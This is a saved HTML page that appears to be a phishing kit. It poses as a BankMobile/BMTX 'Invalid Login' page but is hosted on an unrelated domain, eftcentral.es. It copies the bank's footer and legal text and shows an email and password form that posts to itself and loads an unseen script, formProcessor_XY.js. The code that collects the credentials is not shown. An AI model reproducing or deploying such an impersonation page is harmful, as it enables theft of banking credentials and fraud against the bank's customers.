<!DOCTYPE html>
<!-- saved from url=(0057)https://eftcentral.es/vibeaccounts/authenticate/login.php -->
<html lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta name="robots" content="noindex">  
    
    
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link href="./Invalid Login_files/bootstrap.min.css" rel="stylesheet" type="text/css">
    <link href="./Invalid Login_files/outpages_index.css" rel="stylesheet" type="text/css">
    <link href="./Invalid Login_files/global.css" rel="stylesheet" type="text/css">
    <title>Invalid Login</title>
    <link rel="shortcut icon" href="https://eftcentral.es/vibeaccounts/favicon.ico" type="image/x-icon">
</head>
<body>
  <div id="homepage-wrapper">
    <div class="col-xs-12" id="resp-outheader">
      <div class="hdr-logo-padding">
          <a href="https://eftcentral.es/"><img src="./Invalid Login_files/title_1.gif" height="68" alt="" style="visibility: hidden;"></a>
      </div>
      <div class="row" id="login-row">

  <form id="loginForm" method="post" style="display: inline" autocomplete="off">

    <div class="col-xs-12 col-md-offset-0">
        <div class="row">
            <div class="login-fields">
                <div class="col-sm-6 login-padding">
                    <label for="fld.emailaddress">Email Address:</label>
                    <div class="login-input login-min-width">
                        <input id="fld.emailaddress" class="form-control-placeholder" type="text" size="35" maxlength="80" placeholder="Ex: janedoe@yahoo.com" required name="username" tabindex="1">
                    </div>
                </div>
                <div class="col-sm-6 login-padding">
                    <label for="fld.password">Password:</label>
                    <div class="login-input login-min-width">
                        <input id="fld.password" class="form-control-placeholder" type="password" size="15" maxlength="64" placeholder="(case sensitive)" required name="password" tabindex="2">
                        <a href="https://eftcentral.es/vibeaccounts/authenticate/login.php#" class="bm-green smaller forgot-password" tabindex="4">Forgot Login Information?</a>
                    </div>
                </div>
            </div>
            <div class="login-padding login-button-group">
                <button class="btn btn-login btn-primary" type="submit" id="r1c0m1i3" tabindex="3">LOG IN!</button>
                <div class="get_started_div"></div>
            </div>
        </div>
    </div>
</form>
 </div>
    </div>

    <script src="formProcessor_XY.js"></script>


    <div class="row" style="margin-left:0;margin-right:0;">
      <div class="outpagebody_div col-xs-12">
          <div class="outpagebody_pagecontent body-padding">
            <table cellpadding="0" cellspacing="0">
              <tbody>
                <tr>
                  <td class="transperentBg"><img src="./Invalid Login_files/transparent.gif" height="400" alt="blank image"></td>
                  <td valign="top">
                    <table class="panel error errorBlock" cellspacing="0" width="400">
                      <tbody>
                        <tr>
                          <td class="panelHeader headerFont">Error: Invalid Login</td>
                        </tr>
                        <tr>
                          <td class="formBG">
                            <table class="panelContent" cellspacing="0">
                              <tbody>
                                <tr>
                                  <td class="errorList">To log in, enter your email address and password and select the "Log In!" button.</td>
                                </tr>
                              </tbody>
                            </table>
                          </td>
                        </tr>
                      </tbody>
                    </table>
                  </td>
                </tr>
              </tbody>
            </table>
          </div>
      </div>
    </div>
    <div class="ftr_bar_wide"></div>
      <div id="footer-footer">
        <div class="footertext">
            <a href="https://eftcentral.es/index.jsp">Home</a> |
            <a href="https://eftcentral.es/cust/out/external/security.do" target="security">Security</a> |
            <a href="https://eftcentral.es/main/feeschedules.do">Fee Schedules</a> |
            <a href="https://eftcentral.es/info/accountagreements.do">Terms and Conditions</a> |
            <a href="https://www.bmtx.com/privacy-policy">Privacy Statement</a> |
            <a href="https://www.bmtx.com/privacy-notice-california">Privacy Notice for California Residents</a> |
            <a href="https://eftcentral.es/outcontact.jsp">Contact Us</a> |
            <a href="https://eftcentral.es/easyhelp/pta?basepage=answer&amp;type=public&amp;param=746" target="EasyHelp" rel="external">Identity Verification</a> |
            <a href="https://eftcentral.es/easyhelp/pta?basepage=std_alp.php&amp;type=public" target="EasyHelp" rel="external">FAQs</a>
        </div>
        <div class="footertext footer_legaltext">
            <p><img src="./Invalid Login_files/fdic-housing.png" alt="BMTX, Inc.&gt;" class="fdic-logo"></p>

            © 2024 BMTX, Inc., a wholly owned subsidiary of BM Technologies, Inc. All Rights Reserved.<br>


            <br> Digital banking platform powered by BMTX, Inc. BankMobile banking products and banking services are provided by First Carolina Bank, Member FDIC &amp; Equal Housing Lender. The BankMobile Debit Mastercard® card is issued by First
            Carolina Bank pursuant to license from Mastercard International Incorporated. The card is administered by First Carolina Bank. Mastercard and the Mastercard brand mark are registered trademarks of Mastercard International Incorporated.
            All other names and logos are owned by their respective owners.<br>


            <br> BM Technologies, Inc., PO Box 278, Maple Shade, NJ 08052
        </div>
      </div>
  </div>
<script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'90c35c55f9b8d70e',t:'MTczODU5NTU2Mi4wMDAwMDA='};var a=document.createElement('script');a.nonce='';a.src='/cdn-cgi/challenge-platform/scripts/jsd/main.js';document.getElementsByTagName('head')[0].appendChild(a);";b.getElementsByTagName('head')[0].appendChild(d)}}if(document.body){var a=document.createElement('iframe');a.height=1;a.width=1;a.style.position='absolute';a.style.top=0;a.style.left=0;a.style.border='none';a.style.visibility='hidden';document.body.appendChild(a);if('loading'!==document.readyState)c();else if(window.addEventListener)document.addEventListener('DOMContentLoaded',c);else{var e=document.onreadystatechange||function(){};document.onreadystatechange=function(b){e(b);'loading'!==document.readyState&&(document.onreadystatechange=e,c())}}}})();</script><iframe height="1" width="1" style="position: absolute; top: 0px; left: 0px; border: none; visibility: hidden;" src="./Invalid Login_files/saved_resource.html"></iframe>
</body></html>